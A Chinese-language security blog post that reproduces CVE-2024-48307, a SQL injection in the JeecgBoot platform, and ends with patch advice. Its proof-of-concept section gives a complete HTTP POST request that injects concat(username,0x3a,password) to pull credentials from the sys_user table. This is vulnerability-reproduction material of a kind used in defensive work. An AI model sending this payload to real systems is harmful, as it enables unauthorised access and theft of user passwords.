【成功复现】JeecgBoot SQL注入漏洞(CVE-2024-48307)

【成功复现】JeecgBoot SQL注入漏洞(CVE-2024-48307)

原创 弥天安全实验室 弥天安全实验室 2024-12-04 04:44

网安引领时代,弥天点亮未来   

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍JeecgBoot是中国国炬(Jeecg)公司的一个适用于企业 Web 应用程序的 Java 低代码平台。采用前后端分离架构:SpringBoot2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码。JeecgBoot v3.7.1版本存在安全漏洞,该漏洞源于通过组件 /onlDragDatasetHead/getTotalData 发现包含 SQL 注入漏洞。0x02影响版本org.jeecgframework.boot:jeecg-boot-parent<3.7.1

0x03漏洞复现
1.访问漏洞环境


2.对漏洞进行复现 POC 漏洞复现POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1Host: 127.0.0.1User-Agent: curl/7.88.1Accept: /Content-Type: application/jsonContent-Length: 284Connection: close{“tableName”:”sys_user”,”compName”:”test”,”condition”:{“filter”:{}},”config”:{“assistValue”:[],”assistType”:[],”name”:[{“fieldName”:”concat(username,0x3a,password)”,”fieldType”:”string”},{“fieldName”:”id”,”fieldType”:”string”}],”value”:[{“fieldName”:”id”,”fieldType”:”1″}],”type”:[]}}      测试,通过响应判断漏洞存在。3.nuclei文件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.jeecg.com/https://github.com/jeecgboot/JeecgBoot/issues/7237‍弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润!   弥  天安全实验室